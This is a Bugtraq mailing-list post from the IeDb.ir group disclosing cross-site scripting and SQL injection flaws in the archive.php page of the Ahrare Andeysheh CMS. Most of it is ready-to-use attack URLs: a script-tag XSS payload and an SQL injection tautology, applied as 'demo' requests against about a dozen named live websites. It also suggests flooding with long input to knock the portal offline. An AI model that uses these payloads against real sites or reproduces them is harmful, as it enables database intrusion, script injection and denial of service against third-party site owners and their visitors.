[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Ahrare Andeysheh Cms Multiple Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Ahrare Andeysheh Cms Multiple Vulnerabilities
From: iesb.team@xxxxxxxxx
Date: Sat, 16 Apr 2016 18:45:31 GMT

Xss and sqli and poc on ahrare andeysheh cms to all versions

#################################

#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#

#####################################

#####################################

# Iranian Exploit DataBase

# Ahrare Andeysheh Cms Multiple Vulnerabilities

# Vulnerability : Xss & Sql Injection & Poc

# Vulnerability on : archive.php

# Version : All Versions

# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg

# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg

# Vendor site : http://www.ahrareandeysheh.com/

# Author : IeDb.Ir

# Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir

# Vulnerability attack information site : http://xssed.Ir/

# Archive Exploit = http://kkli.ir/aOFh6

#####################################

# Bug :
[Xss And Sql Injection] to from=1395/01/01

http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01[Xss&Sql]&to=1395/01/26&sec_id=99999999

Poc :

http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=[Poc]
http://www.site.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999')
 oR 5967562=5967562--

# Dem0 [ Xss And Sqli]

http://enghelab-news.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss
 And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss
 And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.hezbollah-k.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss
 And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://smquran.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss
 And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://sabernews.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss
 And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.tabatabaey.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss
 And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://atabe.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss
 And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.dorplast.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss
 And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.nedanews.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss
 And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.ahrareandeysheh.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss
 And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999
http://www.hezbollah-k.com/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01'"><script>alert('Xss
 And Sql And Poc By Amir - Iedb.Ir')</script>&to=1395/01/26&sec_id=99999999

Demo [Poc]

http://www.jameparsi.ir/archive.php?startrec=2&service_id=-1&cat_id=-1&rpp=20&from=1395/01/01&to=1395/01/26&sec_id=99999999')
 oR 5967562=5967562--

Insert Java Code Or very long input, and disrupt the system And This portal 
will be unavailable.


# Pic Of Xss Vulnerability : http://up.iedb.ir/uploads/ahrar-bug1.jpg

# Pic Of Sql Vulnerability : http://up.iedb.ir/uploads/ahrar-bug2.jpg

#####################################

Tnks To : All Member In Iedb.ir And Iedb.ir/acc

B3hz4d - C0dex - Mr.time - Bl4ck M4n - Mahdi-x - Khashayar - Iedb - AliTn - 
Sinizian Man - one alone hacker - Dr.Koders - b3hz4d4

Medrik - Security - Net.Hun73r - Tak.Fanar And All Member In Iedb Forum

#####################################

# Archive Exploit = http://iedb.ir/exploits-5061.html

#####################################

Prev by Date: [CVE-2016-3996]KNOX clipboard data disclosure KNOX 1.0 - KNOX 2.3 / Android
Next by Date: [SECURITY] [DSA 3551-1] fuseiso security update
Previous by thread: [CVE-2016-3996]KNOX clipboard data disclosure KNOX 1.0 - KNOX 2.3 / Android
Next by thread: [SECURITY] [DSA 3551-1] fuseiso security update
Index(es):
- Date
- Thread